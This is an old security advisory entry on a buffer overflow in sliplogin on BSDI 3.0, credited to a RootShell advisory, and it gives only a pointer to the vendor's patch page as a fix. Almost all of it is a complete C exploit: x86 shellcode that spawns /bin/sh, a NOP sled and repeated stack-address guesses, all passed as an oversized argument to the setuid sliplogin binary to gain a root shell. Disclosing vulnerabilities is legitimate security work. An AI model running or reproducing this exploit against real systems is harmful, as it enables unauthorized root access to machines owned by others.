COMMAND
	    sliplogin
SYSTEMS AFFECTED
	    BSDI 3.0 (possibly others too)
PROBLEM
	    Following  sliplogin  exploit  was  found  as  part  of  RootShell
	    Security Advisory #3.  Exploit follows:
	
	    #include <stdlib.h>
	    #include <unistd.h>
	    unsigned long get_esp(void)
	    {
	     __asm__("movl %esp, %eax");
	    }
	    void main(int argc, char **argv)
	    {
	     unsigned char shell[] =
	      "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
	      "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
	      "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff_bin_sh";
	     char *buf,*p;
	     unsigned long *adr;
	     int i;
	     if((p = buf = malloc(2028+28))==NULL)
	     exit(-1);
	     memset(p, 0x90, 2028);
	     p += 2028 - strlen(shell);
	     for(i = 0; i < strlen(shell); i++)
	      *p++ = shell[i];
	     adr = (long *)p;
	     for(i = 0; i < 7; i++)
	      *adr++ = get_esp();
	     p = (char *)adr;
	     *p = 0;
	     execl("/usr/sbin/sliplogin", buf, NULL);
	    }
	
SOLUTION
	    Not sure if this is patched or not, however, you should check BSDI
	    patch page.  As soon as I get info I'll update this.